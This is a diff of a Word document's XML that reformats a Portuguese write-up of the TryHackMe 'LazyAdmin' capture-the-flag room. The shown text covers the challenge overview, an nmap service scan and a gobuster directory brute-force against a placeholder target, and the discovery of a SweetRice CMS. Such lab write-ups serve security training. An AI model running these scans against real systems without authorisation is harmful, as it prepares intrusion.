-          <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
-          <w:b/>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="24"/>
-        </w:rPr>
-      </w:pPr>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:rPr>
-          <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
-          <w:b/>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="24"/>
-        </w:rPr>
-      </w:pPr>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:rPr>
-          <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
-          <w:b/>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="24"/>
-        </w:rPr>
-      </w:pPr>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:rPr>
-          <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
-          <w:b/>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="24"/>
-        </w:rPr>
-      </w:pPr>
     </w:p>
     <w:p>
       <w:pPr>
@@ -1571,25 +1610,92 @@
           <w:between w:val="nil"/>
         </w:pBdr>
         <w:spacing w:after="0" w:line="360" w:lineRule="auto"/>
+        <w:jc w:val="both"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t xml:space="preserve">O CTF "LazyAdmin" da TryHackMe desafia os participantes a explorar vulnerabilidades comuns em sistemas web, começando com </w:t>
+      </w:r>
+      <w:r>
         <w:rPr>
           <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
           <w:b/>
-          <w:smallCaps/>
-          <w:color w:val="000000"/>
-          <w:sz w:val="32"/>
-          <w:szCs w:val="32"/>
-        </w:rPr>
-      </w:pPr>
+          <w:bCs/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t>reconhecimento</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> e varredura de portas para identificar pontos de entrada. O foco inicial é acessar uma interface administrativa web, muitas vezes configurada com </w:t>
+      </w:r>
       <w:r>
         <w:rPr>
           <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
           <w:b/>
-          <w:smallCaps/>
-          <w:color w:val="000000"/>
-          <w:sz w:val="32"/>
-          <w:szCs w:val="32"/>
-        </w:rPr>
-        <w:t>Contextualização</w:t>
+          <w:bCs/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t>credenciais fracas</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t xml:space="preserve">. A exploração envolve </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
+          <w:b/>
+          <w:bCs/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t>enumeração</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> para encontrar diretórios ou arquivos ocultos e analisar configurações inadequadas. Após obter acesso, os jogadores podem realizar </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
+          <w:b/>
+          <w:bCs/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t>escalada de privilégios</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> aproveitando permissões ou scripts mal configurados. O objetivo é coletar "flags" ao longo do desafio, reforçando habilidades em exploração e defesa de sistemas web.</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -1608,158 +1714,33 @@
           <w:szCs w:val="24"/>
         </w:rPr>
       </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="24"/>
-        </w:rPr>
-        <w:lastRenderedPageBreak/>
-        <w:t>O CTF "</w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="24"/>
-        </w:rPr>
-        <w:t>LazyAdmin</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="24"/>
-        </w:rPr>
-        <w:t xml:space="preserve">" da </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="24"/>
-        </w:rPr>
-        <w:t>TryHackMe</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="24"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> desafia os participantes a explorar vulnerabilidades comuns em sistemas web, começando com </w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
-          <w:b/>
-          <w:bCs/>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="24"/>
-        </w:rPr>
-        <w:t>reconhecimento</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="24"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> e varredura de portas para identificar pontos de entrada. O foco inicial é acessar uma interface administrativa web, muitas vezes configurada com </w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
-          <w:b/>
-          <w:bCs/>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="24"/>
-        </w:rPr>
-        <w:t>credenciais fracas</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="24"/>
-        </w:rPr>
-        <w:t xml:space="preserve">. A exploração envolve </w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
-          <w:b/>
-          <w:bCs/>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="24"/>
-        </w:rPr>
-        <w:t>enumeração</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="24"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> para encontrar diretórios ou arquivos ocultos e analisar configurações inadequadas. Após obter acesso, os jogadores podem realizar </w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
-          <w:b/>
-          <w:bCs/>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="24"/>
-        </w:rPr>
-        <w:t>escalada de privilégios</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="24"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> aproveitando permissões ou scripts mal configurados. O objetivo é coletar "flags" ao longo do desafio, reforçando habilidades em exploração e defesa de sistemas web.</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pBdr>
-          <w:top w:val="nil"/>
-          <w:left w:val="nil"/>
-          <w:bottom w:val="nil"/>
-          <w:right w:val="nil"/>
-          <w:between w:val="nil"/>
-        </w:pBdr>
-        <w:spacing w:after="0" w:line="360" w:lineRule="auto"/>
-        <w:rPr>
-          <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="24"/>
-        </w:rPr>
-      </w:pPr>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pBdr>
-          <w:top w:val="nil"/>
-          <w:left w:val="nil"/>
-          <w:bottom w:val="nil"/>
-          <w:right w:val="nil"/>
-          <w:between w:val="nil"/>
-        </w:pBdr>
-        <w:spacing w:after="0" w:line="360" w:lineRule="auto"/>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Ttulo1"/>
+        <w:rPr>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+      </w:pPr>
+      <w:bookmarkStart w:id="1" w:name="_Toc210330562"/>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t>Desenvolvimento</w:t>
+      </w:r>
+      <w:bookmarkEnd w:id="1"/>
+    </w:p>
+    <w:p>
+      <w:pPr>
         <w:rPr>
           <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
           <w:b/>
           <w:smallCaps/>
           <w:color w:val="000000"/>
-          <w:sz w:val="32"/>
-          <w:szCs w:val="32"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+          <w:lang w:val="en-US"/>
         </w:rPr>
       </w:pPr>
       <w:r>
@@ -1768,155 +1749,28 @@
           <w:b/>
           <w:smallCaps/>
           <w:color w:val="000000"/>
-          <w:sz w:val="32"/>
-          <w:szCs w:val="32"/>
-        </w:rPr>
-        <w:t>Desenvolvimento</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:rPr>
-          <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
-          <w:b/>
-          <w:smallCaps/>
-          <w:color w:val="000000"/>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="24"/>
-        </w:rPr>
-      </w:pPr>
-      <w:bookmarkStart w:id="1" w:name="_heading=h.3znysh7" w:colFirst="0" w:colLast="0"/>
-      <w:bookmarkEnd w:id="1"/>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
-          <w:b/>
-          <w:smallCaps/>
-          <w:color w:val="000000"/>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="24"/>
-        </w:rPr>
-        <w:t>What</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
-          <w:b/>
-          <w:smallCaps/>
-          <w:color w:val="000000"/>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="24"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
-          <w:b/>
-          <w:smallCaps/>
-          <w:color w:val="000000"/>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="24"/>
-        </w:rPr>
-        <w:t>is</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
-          <w:b/>
-          <w:smallCaps/>
-          <w:color w:val="000000"/>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="24"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
-          <w:b/>
-          <w:smallCaps/>
-          <w:color w:val="000000"/>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="24"/>
-        </w:rPr>
-        <w:t>the</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
-          <w:b/>
-          <w:smallCaps/>
-          <w:color w:val="000000"/>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="24"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
-          <w:b/>
-          <w:smallCaps/>
-          <w:color w:val="000000"/>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="24"/>
-        </w:rPr>
-        <w:t>user</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
-          <w:b/>
-          <w:smallCaps/>
-          <w:color w:val="000000"/>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="24"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> flag?</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:rPr>
-          <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="24"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="24"/>
-        </w:rPr>
-        <w:t xml:space="preserve">Começando com um simples </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="24"/>
-        </w:rPr>
-        <w:t>scan</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="24"/>
-        </w:rPr>
-        <w:t xml:space="preserve">, usando o NMAP, </w:t>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t>What is the user flag?</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t xml:space="preserve">Começando com um simples scan, usando o NMAP, </w:t>
       </w:r>
       <w:r>
         <w:rPr>
@@ -1961,79 +1815,7 @@
           <w:sz w:val="24"/>
           <w:szCs w:val="24"/>
         </w:rPr>
-        <w:t xml:space="preserve"> </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="24"/>
-        </w:rPr>
-        <w:t>nmap</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="24"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> -</w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="24"/>
-        </w:rPr>
-        <w:t>sS</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="24"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> -</w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="24"/>
-        </w:rPr>
-        <w:t>sV</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="24"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> &lt;</w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="24"/>
-        </w:rPr>
-        <w:t>IP_target</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="24"/>
-        </w:rPr>
-        <w:t>&gt;</w:t>
+        <w:t xml:space="preserve"> nmap -sS -sV &lt;IP_target&gt;</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -2111,25 +1893,7 @@
           <w:sz w:val="24"/>
           <w:szCs w:val="24"/>
         </w:rPr>
-        <w:t xml:space="preserve">Analisando primeira a porta HTTP, </w:t>
-      </w:r>
-      <w:proofErr w:type="gramStart"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="24"/>
-        </w:rPr>
-        <w:t>aonde</w:t>
-      </w:r>
-      <w:proofErr w:type="gramEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="24"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> está rodando um servidor Apache, não achamos nada de importante, apenas a página padrão do Apache.</w:t>
+        <w:t>Analisando primeira a porta HTTP, aonde está rodando um servidor Apache, não achamos nada de importante, apenas a página padrão do Apache.</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -2208,33 +1972,16 @@
           <w:sz w:val="24"/>
           <w:szCs w:val="24"/>
         </w:rPr>
-        <w:t xml:space="preserve">Utilizando o </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="24"/>
-        </w:rPr>
-        <w:t>Gobuster</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="24"/>
-        </w:rPr>
-        <w:t xml:space="preserve">, podemos encontrar um diretório interessante, o “/contente”. </w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:rPr>
-          <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="24"/>
+        <w:t xml:space="preserve">Utilizando o Gobuster, podemos encontrar um diretório interessante, o “/contente”. </w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+          <w:lang w:val="en-US"/>
         </w:rPr>
       </w:pPr>
       <w:r>
@@ -2246,6 +1993,7 @@
           <w:iCs/>
           <w:sz w:val="24"/>
           <w:szCs w:val="24"/>
+          <w:lang w:val="en-US"/>
         </w:rPr>
         <w:t>Comando usado:</w:t>
       </w:r>
@@ -2254,142 +2002,9 @@
           <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
           <w:sz w:val="24"/>
           <w:szCs w:val="24"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="24"/>
-        </w:rPr>
-        <w:t>gobuster</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="24"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="24"/>
-        </w:rPr>
-        <w:t>dir</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="24"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> -w /</w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="24"/>
-        </w:rPr>
-        <w:t>usr</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="24"/>
-        </w:rPr>
-        <w:t>/</w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="24"/>
-        </w:rPr>
-        <w:t>share</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="24"/>
-        </w:rPr>
-        <w:t>/</w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="24"/>
-        </w:rPr>
-        <w:t>dirb</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="24"/>
-        </w:rPr>
-        <w:t>/</w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="24"/>
-        </w:rPr>
-        <w:t>wordlists</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="24"/>
-        </w:rPr>
-        <w:t>/common.txt -</w:t>
-      </w:r>
-      <w:proofErr w:type="gramStart"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="24"/>
-        </w:rPr>
-        <w:t>u  http</w:t>
-      </w:r>
-      <w:proofErr w:type="gramEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="24"/>
-        </w:rPr>
-        <w:t>://</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="24"/>
-        </w:rPr>
-        <w:t>&lt;IP_target&gt;</w:t>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> gobuster dir -w /usr/share/dirb/wordlists/common.txt -u  http://&lt;IP_target&gt;</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -2467,25 +2082,7 @@
           <w:sz w:val="24"/>
           <w:szCs w:val="24"/>
         </w:rPr>
-        <w:t xml:space="preserve">Acessando-o, achamos uma página falando sobre um CMS instalado, chamado </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="24"/>
-        </w:rPr>
-        <w:t>SweetRice</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="24"/>
-        </w:rPr>
-        <w:t>.</w:t>
+        <w:t>Acessando-o, achamos uma página falando sobre um CMS instalado, chamado SweetRice.</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -2555,25 +2152,7 @@
           <w:sz w:val="24"/>
           <w:szCs w:val="24"/>
         </w:rPr>
